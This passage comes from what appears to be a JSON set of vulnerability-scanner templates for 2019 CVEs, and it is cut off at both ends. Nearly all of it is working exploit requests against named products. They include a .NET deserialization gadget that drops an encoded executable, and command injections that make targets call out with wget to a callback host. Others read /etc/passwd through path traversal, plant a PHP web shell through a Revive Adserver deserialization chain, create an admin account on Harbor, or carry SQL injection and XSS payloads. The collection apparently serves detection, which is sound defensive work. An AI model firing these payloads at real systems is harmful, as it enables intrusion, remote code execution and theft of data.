Jpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAALoXL2MgZWNobyBUVnFRQUFNQUFBQUVBQUFBLy84QUFMZ0FBQUFBQUFBQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQTZBQUFBQTRmdWc0QXRBbk5JYmdCVE0waFZHaHBjeUJ3Y205bmNtRnRJR05oYm01dmRDQmlaU0J5ZFc0Z2FXNGdSRTlUSUcxdlpHVXVEUTBLSkFBQUFBQUFBQUNUT1BEVzExbWVoZGRabm9YWFdaNkZyRVdTaGROWm5vVlVSWkNGM2xtZWhiaEdsSVhjV1o2RnVFYWFoZFJabm9YWFdaK0ZIbG1laFZSUnc0WGZXWjZGZzNxdWhmOVpub1VRWDVpRjFsbWVoVkpwWTJqWFdaNkZBQUFBQUFBQUFBQUFBQUFBQUFBQUFGQkZBQUJNQVFRQU81UnRTZ0FBQUFBQUFBQUE0QUFQQVFzQkJnQUFzQUFBQUtBQUFBQUFBQUNiaFFBQUFCQUFBQURBQUFBQUFFQUFBQkFBQUFBUUFBQUVBQUFBQUFBQUFBUUFBQUFBQUFBQUFHQUJBQUFRQUFBQUFBQUFBZ0FBQUFBQUVBQUFFQUFBQUFBUUFBQVFBQUFBQUFBQUVBQUFBQUFBQUFBQUFBQUFiTWNBQUhnQUFBQUFVQUVBeUFjQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU9EQkFBQWNBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBREFBQURnQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBTG5SbGVIUUFBQUJtcVFBQUFCQUFBQUN3QUFBQUVBQUFBQUFBQUFBQUFBQUFBQUFBSUFBQVlDNXlaR0YwWVFBQTVnOEFBQURBQUFBQUVBQUFBTUFBQUFBQUFBQUFBQUFBQUFBQUFFQUFBRUF1WkdGMFlRQUFBRnh3QUFBQTBBQUFBRUFBQUFEUUFBQUFBQUFBQUFBQUFBQUFBQUJBQUFEQUxuSnpjbU1BQUFESUJ3QUFBRkFCQUFBUUFBQUFFQUVBQUFBQUFBQUFBQUFBQUFBQVFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE%2bPiVURU1QJVxock9YVy5iNjQGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA%2bU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw%3d%3d%3c/System.Security.ClaimsIdentity.actor%3e%0a%20%20%20%20%3c/a1%3aWindowsIdentity%3e%0a%20%20%3c/SOAP-ENV%3aBody%3e%0a%3c/SOAP-ENV%3aEnvelope%3e","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["System.InvalidCastException","System.Web.Services.Protocols.SoapException"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2019-17574","info":{"name":"Popup-Maker < 1.8.12 - Broken Authentication","severity":"critical"},"requests":[{"raw":["GET /?pum_action=tools_page_tab_system_info HTTP/1.1\nHost: {{Hostname}}\n","POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npopmake_action=popup_sysinfo&popmake-sysinfo=CVE-2019-17574\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["Popup Maker Configuration","Webserver Configuration"],"condition":"and"},{"type":"word","part":"body_2","words":["CVE-2019-17574"]}]}]},{"id":"CVE-2019-20933","info":{"name":"InfluxDB <1.7.6 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/query?db=db&q=SHOW%20DATABASES"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"results\":","\"name\":\"databases\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12725","info":{"name":"Zeroshell 3.9.0 - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW="],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16097","info":{"name":"Harbor <=1.82.0 - Privilege Escalation","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/users"],"body":"{\"username\": \"testpoc\", \"has_admin_role\": true, \"password\": \"TestPoc!\", \"email\": \"testpoc@interact.sh\", \"realname\": \"poc\"}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"response","words":["username has already been used","Location: /api/users/"],"condition":"or"},{"type":"status","status":[201,409],"condition":"or"}]}]},{"id":"CVE-2019-2579","info":{"name":"Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - SQL Injection","severity":"medium"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1\nHost: {{Hostname}}\n","POST /cs/ContentServer HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["value='&#39; and &#39;1&#39;=&#39;0 --","Use this utility to view and manage URLs"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"authkey","group":1,"regex":["NAME='_authkey_' VALUE='([0-9A-Z]+)'>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-12583","info":{"name":"Zyxel ZyWall UAG/USG - Account Creation Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/free_time.cgi"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["free_time_redirect.cgi?u=","&smsOnly=0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18371","info":{"name":"Xiaomi Mi WiFi R3G Routers - Local file Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api-third-party/download/extdisks../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7255","info":{"name":"Linear eMerge E3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/badging/badge_template_v0.php?layout=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Template : <script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9955","info":{"name":"Zyxel - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?mp_idx=%22;alert(%271%27);//"],"matchers":[{"type":"word","part":"body","words":["\";alert('1');//","<title>Welcome</title>"],"condition":"and"}]}]},{"id":"CVE-2019-16057","info":{"name":"D-Link DNS-320 -  Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(body, \"uid=\", \"gid=\", \"pwd&id\")"],"condition":"and"}]}]},{"id":"CVE-2019-16662","info":{"name":"rConfig 3.9.2 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15859","info":{"name":"Socomec DIRIS A-40 Devices Password Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/password.jsn"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/json"]},{"type":"word","part":"body","words":["username","password"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12276","info":{"name":"GrandNode 4.40 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/LetsEncrypt/Index?fileName=/etc/passwd"],"headers":{"Connection":"close"},"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16469","info":{"name":"Adobe Experience Manager - Expression Language Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/mnt/overlay/dam/gui/content/assets/metadataeditor.external.html?item=$%7b{{num1}}*{{num2}}%7d"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["data-formid=\"{{result}}\"","Embed Code"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11510","info":{"name":"Pulse Connect Secure SSL VPN Arbitrary File Read","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-13392","info":{"name":"MindPalette NateMail 3.0.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /NateMail.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nrecipient=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2019-9726","info":{"name":"Homematic CCU3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.%00./.%00./etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","bin:.*:0:0:"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12988","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","GET /Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://{{interactsh-url}}) HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-12985","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /Collector/diagnostics/ping HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nipAddress=%60/bin/wget+http://{{interactsh-url}}%60\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-8449","info":{"name":"Jira <8.4.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"users\":{\"users\":"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19824","info":{"name":"TOTOLINK Realtek SD Routers - Remote Command Injection","severity":"high"},"requests":[{"raw":["POST /boafrm/formSysCmd HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46cGFzc3dvcmQ=\nContent-Type: application/x-www-form-urlencoded\n\nsubmit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd=wget+http://{{interactsh-url}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-7219","info":{"name":"Zarafa WebApp <=2.0.1.47791 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webapp/?fccc%27\\%22%3E%3Csvg/onload=alert(/xss/)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(/xss/)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2588","info":{"name":"Oracle Business Intelligence  - Path Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini"],"matchers-condition":"and","matchers":[{"type":"word","words":["for 16-bit app support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18665","info":{"name":"DOMOS 5.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16997","info":{"name":"Metinfo 7.0.0 beta - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nappno= 1 union SELECT 98989*443131,1&editor=cn&site=web\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["43865094559"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19908","info":{"name":"phpMyChat-Plus 1.98 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["username = \"</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8937","info":{"name":"HotelDruid 2.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"</script><script>alert(document.domain)</script>\"><input"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7315","info":{"name":"Genie Access WIP3BVAF IP Camera - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-5434","info":{"name":"Revive Adserver 4.2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /adxmlrpc.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip\n\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?> <methodCall> <methodName>openads.spc</methodName> <params> <param> <value> <struct> <member> <name>remote_addr</name> <value>8.8.8.8</value> </member> <member> <name>cookies</name> <value> <array> </array> </value> </member> </struct> </value> </param> <param><value><string>a:1:{S:4:\"what\";O:11:\"Pdp\\Uri\\Url\":1:{S:17:\"\\00Pdp\\5CUri\\5CUrl\\00host\";O:21:\"League\\Flysystem\\File\":2:{S:7:\"\\00*\\00path\";S:55:\"plugins/3rdPartyServers/ox3rdPartyServers/max.class.php\";S:13:\"\\00*\\00filesystem\";O:21:\"League\\Flysystem\\File\":2:{S:7:\"\\00*\\00path\";S:66:\"x://data:text/html;base64,PD9waHAgc3lzdGVtKCRfR0VUWyIwIl0pOyA/Pg==\";S:13:\"\\00*\\00filesystem\";O:29:\"League\\Flysystem\\MountManager\":2:{S:14:\"\\00*\\00filesystems\";a:1:{S:1:\"x\";O:27:\"League\\Flysystem\\Filesystem\":2:{S:10:\"\\00*\\00adapter\";O:30:\"League\\Flysystem\\Adapter\\Local\":1:{S:13:\"\\00*\\00pathPrefix\";S:0:\"\";}S:9:\"\\00*\\00config\";O:23:\"League\\Flysystem\\Config\":1:{S:11:\"\\00*\\00settings\";a:1:{S:15:\"disable_asserts\";b:1;}}}}S:10:\"\\00*\\00plugins\";a:1:{S:10:\"__toString\";O:34:\"League\\Flysystem\\Plugin\\ForcedCopy\":0:{}}}}}}}</string></value></param> <param><value><string>0</string></value></param> <param><value><string>dsad</string></value></param> <param><value><boolean>1</boolean></value></param> <param><value><boolean>0</boolean></value></param> <param><value><boolean>1</boolean></value></param> </params> </methodCall>\n","GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php?0=id HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["text/html"]},{"type":"regex","part":"body_2","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16332","info":{"name":"WordPress API Bearer Auth <20190907 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/api-bearer-auth/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12986","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /Collector/diagnostics/trace_route HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nipAddress=%60/bin/wget+http://{{interactsh-url}}%60\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-13396","info":{"name":"FlightPath - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ncallback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["idden' name='form_token' value='([a-z0-9]+)'>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-17503","info":{"name":"Kirona Dynamic Resource Scheduler - Information 